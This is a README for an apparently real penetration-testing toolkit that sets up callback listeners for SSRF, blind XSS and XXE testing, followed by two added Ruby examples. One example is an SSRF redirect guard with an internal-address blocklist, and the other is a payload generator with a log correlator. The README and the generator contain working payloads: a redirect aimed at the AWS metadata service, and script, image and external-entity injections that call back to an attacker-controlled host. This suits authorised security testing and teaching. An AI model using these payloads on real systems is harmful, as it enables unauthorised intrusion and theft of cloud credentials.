# Ground control

Repository: https://github.com/jobertabma/ground-control (Ruby; last pushed 2017-06-12; 541 stars and 96 forks at the time this page was synced). Listed under Exploitation: Server Side Request Forgery, XXE Injection.

This is a collection of most of the scripts I use to debug Server Side Request Forgery (SSRF), blind XSS, and insecure XML External Entity (XXE) processing vulnerabilities. It is still a work in progress, as I'm still collecting the scripts I have lingering around. Before this, I would usually rewrite the scripts from scratch or set up listeners with `netcat`. That wasn't scalable, so I started collecting them in a repository that can be cloned onto a server whenever it's needed.

## Requirements
Running these scripts requires Ruby 2.3, a valid SSL certificate for a domain you own, and a server on which ports `80`, `443`, `8080`, and `8443` can be opened. Ports `80` and `443` serve plain web traffic. Port `8080` is an alternative HTTP port that is useful when traffic to port `80` is blocked. Port `8443` is an alternative HTTPS port with one difference: it serves a self-signed SSL certificate. I use it to determine whether the target does SSL certificate validation: if a request to port `8443` shows up in the logs, the component making the request accepted a certificate it could not verify. That does not warrant a security report by itself, but it is often useful to mention when you're filing the SSRF vulnerability.

## Setting up
Clone this repository and install the required components by running `install.sh`. After that, run `start.sh` to start listening on all ports. For now, `root` privileges are required because the server binds ports `80` and `443`. A future version might solve this by switching to a different user context after startup.

## Functions

### Redirects
The `/redirect` endpoint redirects a request to another server or endpoint. This helps when the target validates the URL you supply but then follows redirects: the external host passes the check, and the redirect sends the request on to an internal system. The example below points it at the AWS instance metadata service.

```
curl -vv "http://server/redirect?url=http://169.254.169.254/latest/meta-data/"
```

### Ping Pong
Sometimes you simply need a page that responds with a certain body and headers. The `/ping_pong` endpoint does exactly that. Here's an example.

```
curl -vv "http://server/ping_pong?body=%3ch1%3eHello%3c/h1%3e"
```

### Blind callbacks
To figure out whether an inaccessible system is executing your HTML or XSS payload, add an item to `callback_tokens` in `config.json`. The structure is shown below. Each entry records where you injected the payload, so that when you receive a callback you can tie it back to the injection point and identify the root cause of the vulnerability. Every unique combination of parameter, host, port, path, and method is supposed to have its own `callback_token`.

```
{
  "callback_tokens": {
    "ee34a1791ab345f789": {
      "host": "hackerone.com",
      "port": 443,
      "ssl": true,
      "path": "/webhooks",
      "parameter": "url",
      "method": "POST"
    }
  }
}
```

Depending on what type of vulnerability you want to test for, you have to construct a payload. See below for examples for HTML injection, blind XSS, and XXE. Then submit the payload to the injection point. You'll see a log entry in `logs/access_log` when a request with that `callback_token` is triggered. Most of the time, I use `tail -f logs/access_log` to see if something triggered.

**HTML injection**
```
<img src="https://server/pixel?callback_token=ee34a1791ab345f789" style="display:none;"/>
```

**Blind XSS**
```
<script src="https://server/collect?callback_token=ee34a1791ab345f789"></script>
```

**XXE**
```
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://server/pixel?callback_token=ee34a1791ab345f789">
]>
<r>&sp;</r>
```

The XXE payload declares an external general entity, so a parser that resolves external entities fetches the `/pixel` URL when it expands `&sp;`. A hit in the log proves that external entity processing is enabled even when the parser's output is never shown to you.

### Starting another server
The server listens on ports `80`, `443`, `8080`, and `8443` by default. If you want to start another server on a different port, run `ruby app/server.rb -p :port`. To use SSL, append `-cert :cert.pem`. This is especially useful when a potential SSRF vulnerability only allows connections to certain ports. Say goodbye to all the Apache and nginx configuration hacking!
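The Redirects section above relies on a target that validates the URL it is given and then follows redirects. The following Ruby is an added example, not ground-control's own code: it contrasts that vulnerable fetch pattern with one that re-validates every hop. The hostname `server`, the blocklist, the response table and the resolver stub are all constructed so the example runs offline.

```ruby
require "uri"
require "ipaddr"

# Added example (not part of ground-control). It shows why a /redirect hop
# defeats an SSRF guard that only checks the caller-supplied URL, and how a
# fetcher that re-validates every Location stops it. The HTTP transport and
# DNS resolver are replaced by constructed tables so it runs offline.

# Constructed responses: "server" stands in for your ground-control host and
# answers /redirect with a 302 to the AWS metadata service, as in the README.
FAKE_RESPONSES = {
  "http://server/redirect?url=http://169.254.169.254/latest/meta-data/" =>
    [302, { "Location" => "http://169.254.169.254/latest/meta-data/" }, ""],
  "http://169.254.169.254/latest/meta-data/" =>
    [200, {}, "ami-id\ninstance-id\niam/\n"],
}.freeze

# Address ranges an SSRF sink should never be allowed to reach.
BLOCKED_RANGES = %w[
  0.0.0.0/8 10.0.0.0/8 127.0.0.0/8 169.254.0.0/16 172.16.0.0/12
  192.168.0.0/16 ::1/128 fc00::/7 fe80::/10
].map { |r| IPAddr.new(r) }.freeze

# Constructed resolver stub. Real code would call Resolv.getaddresses and
# check every returned address; unknown names are treated as public here.
def resolve(host)
  return [host] if host =~ /\A[\d.]+\z/ || host.include?(":")
  { "server" => ["203.0.113.10"] }.fetch(host) { ["198.51.100.1"] }
end

# True when the URL points at something the fetcher must not talk to.
def internal_target?(url)
  uri = URI.parse(url)
  return true unless %w[http https].include?(uri.scheme) && uri.host
  resolve(uri.host).any? do |addr|
    ip = IPAddr.new(addr)
    BLOCKED_RANGES.any? { |range| range.include?(ip) }
  end
rescue URI::InvalidURIError, IPAddr::InvalidAddressError
  true
end

def fake_get(url)
  FAKE_RESPONSES.fetch(url) { [404, {}, ""] }
end

# Vulnerable pattern: validate once, then follow redirects blindly.
def naive_fetch(url, max_hops: 5)
  raise "blocked: #{url}" if internal_target?(url)
  max_hops.times do
    status, headers, body = fake_get(url)
    return [url, body] unless (300..399).cover?(status) && headers["Location"]
    url = URI.join(url, headers["Location"]).to_s
  end
  raise "too many redirects"
end

# Hardened pattern: validate the URL of every hop before requesting it.
def safe_fetch(url, max_hops: 5)
  max_hops.times do
    raise "blocked: #{url}" if internal_target?(url)
    status, headers, body = fake_get(url)
    return [url, body] unless (300..399).cover?(status) && headers["Location"]
    url = URI.join(url, headers["Location"]).to_s
  end
  raise "too many redirects"
end

if __FILE__ == $PROGRAM_NAME
  target = "http://server/redirect?url=http://169.254.169.254/latest/meta-data/"
  puts "naive: #{naive_fetch(target).inspect}"
  begin
    safe_fetch(target)
  rescue RuntimeError => e
    puts "safe:  #{e.message}"
  end
end
```

Even the hardened version resolves the name and then (in real code) connects separately, so it is still exposed to DNS rebinding between the two steps; a production fix pins the connection to the address that was checked, or simply refuses to follow redirects at all.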
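The Blind callbacks section above describes a procedure: register an injection point under `callback_tokens`, build a token-specific payload, submit it, and watch `logs/access_log`. The following Ruby is an added example, not ground-control's own code, covering the two ends of that procedure: it generates the three payload types from a `config.json` of the documented shape and maps a log hit back to the entry it came from. The hostname `server`, the second token, and the access-log lines are constructed; in particular the Common Log Format layout is an assumption, since the page does not document what `logs/access_log` actually looks like.

```ruby
require "json"
require "uri"
require "cgi"

# Added example (not ground-control's own code). It generates the per-token
# payloads from a config.json of the shape documented above and maps a hit
# in the access log back to the injection point it belongs to.

CALLBACK_HOST = "server" # the placeholder hostname used throughout the README

# Constructed config.json with two injection points, same structure as above.
CONFIG_JSON = <<~JSON
  {
    "callback_tokens": {
      "ee34a1791ab345f789": {
        "host": "hackerone.com", "port": 443, "ssl": true,
        "path": "/webhooks", "parameter": "url", "method": "POST"
      },
      "5d2c0f9a7b8e4c1d33": {
        "host": "hackerone.com", "port": 443, "ssl": true,
        "path": "/profile", "parameter": "bio", "method": "PUT"
      }
    }
  }
JSON

def load_tokens(json)
  JSON.parse(json).fetch("callback_tokens")
end

# One payload per technique. Only the token varies between injection points,
# which is what lets a single hit be traced back to one config entry.
def payloads_for(token, host = CALLBACK_HOST)
  pixel   = "https://#{host}/pixel?callback_token=#{token}"
  collect = "https://#{host}/collect?callback_token=#{token}"
  xxe = <<~XML
    <?xml version="1.0" ?>
    <!DOCTYPE r [
    <!ELEMENT r ANY >
    <!ENTITY sp SYSTEM "http://#{host}/pixel?callback_token=#{token}">
    ]>
    <r>&sp;</r>
  XML
  {
    html_injection: %(<img src="#{pixel}" style="display:none;"/>),
    blind_xss: %(<script src="#{collect}"></script>),
    xxe: xxe,
  }
end

# Constructed access-log lines. The Common Log Format used here is an
# assumption; ground-control's actual logs/access_log layout is not
# documented on this page, so adapt LOG_LINE to what your server writes.
ACCESS_LOG = <<~LOG
  203.0.113.5 - - [12/Jun/2017:20:51:38 +0000] "GET /pixel?callback_token=ee34a1791ab345f789 HTTP/1.1" 200 43 "-" "Mozilla/5.0"
  203.0.113.9 - - [12/Jun/2017:20:52:01 +0000] "GET /ping_pong?body=x HTTP/1.1" 200 1 "-" "curl/7.54.0"
  198.51.100.7 - - [12/Jun/2017:20:53:10 +0000] "GET /collect?callback_token=deadbeef HTTP/1.1" 200 0 "-" "Mozilla/5.0"
LOG

LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>\S+) (?<target>\S+) [^"]*" (?<status>\d+)/

# Returns [hits, unknown]: hits are log entries carrying a configured token,
# joined to that token's injection point; unknown are tokens seen in the log
# that are not in config (old entries, typos, or someone replaying your payload).
def correlate(log_text, tokens)
  hits, unknown = [], []
  log_text.each_line do |line|
    m = LOG_LINE.match(line) or next
    target = URI.parse(m[:target])
    token = CGI.parse(target.query.to_s)["callback_token"].first or next
    if (entry = tokens[token])
      hits << { token: token, source_ip: m[:ip], time: m[:time],
                endpoint: target.path, injected_at: entry }
    else
      unknown << token
    end
  end
  [hits, unknown]
end

if __FILE__ == $PROGRAM_NAME
  tokens = load_tokens(CONFIG_JSON)
  tokens.each_key { |t| puts payloads_for(t)[:blind_xss] }
  hits, unknown = correlate(ACCESS_LOG, tokens)
  hits.each { |h| puts "#{h[:time]} #{h[:source_ip]} hit #{h[:endpoint]} -> #{h[:injected_at].inspect}" }
  puts "unknown tokens: #{unknown.inspect}" unless unknown.empty?
end
```

The `unknown` list is worth watching as well as the hits: a token you never issued means someone is replaying or scanning your callback host, and a token you deleted from `config.json` that still arrives tells you the payload is still stored somewhere on the target.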